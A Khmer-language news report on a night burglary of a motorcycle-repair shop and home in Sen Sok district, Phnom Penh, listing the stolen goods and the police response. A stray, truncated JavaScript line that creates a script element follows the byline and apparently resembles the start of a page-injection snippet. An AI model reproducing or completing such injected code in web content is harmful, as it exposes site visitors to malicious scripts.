លោកចោរទាំងក្រុមចូលគាស់ផ្ទះ ទយឡានចូលយកទ្រព្យសម្បត្តិមានតម្លៃអស់ខ្ទេច សមត្ថកិច្ចគ្មានលឺសំលេងនៅខណ្ឌសែនសុខ
ភ្នំពេញ៖ ផ្ទះប្រជាពរដ្ឋមួយកន្លែងនៅតាមបណ្ដោយផ្លូវ៣៧១សឡា យីហោជួសជុលម៉ូតូនិងលក់គ្រឿងបន្លាស់ត្រូវបានក្រមចោរមួយក្រុមគាស់យកទ្រព្យសម្បត្តិដាក់ក្នុងរថយន្តយកទៅបាត់។ ហេតុការណ៍នេះធ្វើអោយមានការភ្ញាក់ផ្អើលនៅវេលាម៉ោងប្រមាណ១និង៣០នាទីរំលង អាធ្រាតឈានចូលថ្ងៃទី២៩ខែកក្កដាឆ្នាំ២០១៦ ស្ថិតក្នុងភូមិបែកក្អម សង្កាត់ទឹកថ្លា ខណ្ឌសែនសុខ។
ជនរងគ្រោះជាម្ចាស់ផ្ទះមានឈ្មោះហ៊ុនវ ណ្ណះ ភេទប្រុសអាយុ៣០ឆ្នាំជាង មានមុខរបរជួសជុលម៉ូតូនិងលក់គ្រឿងបន្លាស់ម៉ូតូ។
ប្រភពបានអោយដឹងថា មុនពេលកើតហេតុគេបានចាក់សោរផ្ទះចោលទៅធ្វើបុណ្យឯស្រុកកំនើតពីបីថ្ងៃមកហើយ ខណ:ដែលក្រុមចោរធ្វើសកម្មភាពម្ចាស់ មិនទាន់ត្រលប់មកវិញនោះទេ។
ប្រភពបន្តស្រាប់តែនៅយប់ថ្ងៃកើតហេតុគេឃើញមានរថយន្តមួយគ្រឿងមិនស្គាល់ម៉ាកកញ្ចក់បិតស្គុតខ្មៅបានមកឈប់នៅមុខផ្ទះបានចាក់សោរផ្ទះរួចបានជញ្ជូនទ្រព្យសម្បត្តិក្នុងផ្ទះដាក់ក្នុងរថយន្តរួចបានបើកចេញទៅបាត់។ ក្រោយកើតហេតុឃើញផ្ទះចំហទ្វារដោយមានការសង្ស័យប្រជាពរដ្ឋបានតេទៅបងប្អូនអោយមកមើលស្រាប់តែផ្ទះត្រូវបានក្រុមចោរគាស់ពិតប្រាកដមែន។
ទ្រព្យសម្បត្តិដែលបានបាត់បង់រួមមានម៉ូតូគូបហាពណ៌ទឹកបិុចពាក់ស្លាកលេខភ្នំពេញ 1N-4191និងទូរទស្សន៍មួយគ្រឿង និងសំបកម៉ូតូថ្មីៗមិនទាន់ហែកលក់ព្រមទាំងគ្រឿងបន្លាស់ម៉ូតូជាច្រើនទៀត បើគិតជាប្រាក់អស់រាប់រយពាន់ដុល្លារ។
ក្រោយកើតហេតុសមត្ថកិច្ចមកដល់កន្លែងកើតហេតុបានមើលក្នុងផ្ទះឃើញថាមានការរើកាកាយពេញផ្ទះដូចច្នេះសន្និដ្ឋានថាពិតជាចោរគាស់ចូលផ្ទះយកទ្រព្យសម្បត្តិមែន។ រួចអោយជនរងគ្រោះទៅដាក់ពាក្យបណ្ដឹងនៅប៉ុស្តិ៍ទឹកថ្លាដើម្បីកំណត់មុខសញ្ញាចាប់ក្រុមចោរទាំងនោះមកផ្ទាន់ន្ទាទោសទៅតាមផ្លូវច្បាប់។ ដោយ៖ព្រះអង្គខ្មៅមានរិទ្ធិ
var d=document;var s=d.createElement(‘script’);